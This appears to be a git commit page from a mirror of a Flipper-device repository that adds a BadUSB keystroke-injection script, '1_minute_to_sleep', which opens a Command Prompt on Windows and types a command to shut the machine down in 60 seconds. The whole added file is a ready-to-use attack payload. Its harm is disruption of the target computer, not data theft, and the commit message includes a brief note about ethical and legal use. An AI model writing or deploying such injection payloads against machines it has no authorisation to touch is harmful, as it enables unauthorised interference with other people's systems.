mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-21 22:10:12 +00:00
1_minute_to_sleep
This Windows script, created by Mr. Black, opens the Command Prompt and schedules a system shutdown after one minute ⌛️. It is important to use scripts of this type ethically and legally ⚠️.
This commit is contained in:
parent
88bbc6d284
commit
ce0fcd7b67
15
BadUSB/1_minute_to_sleep
Normal file
15
BadUSB/1_minute_to_sleep
Normal file
@ -0,0 +1,15 @@
|
||||
REM Author: Mr.Black (mrblack0 on Discord)
|
||||
REM Description: Shut down your computer every 1 minute, Windows 10+ only
|
||||
REM Version: 1.0
|
||||
REM Category: Execution
|
||||
DELAY 500
|
||||
REM Open the Start menu
|
||||
DELAY 500
|
||||
REM Type "cmd" and press Enter to open the Command Prompt
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 500
|
||||
REM Wait to ensure that the Command Prompt is open
|
||||
REM Type the scheduled shutdown command (1 minutes = 60 seconds)
|
||||
STRING shutdown /s /t 60
|
||||
ENTER
|
Loading…
Reference in New Issue
Block a user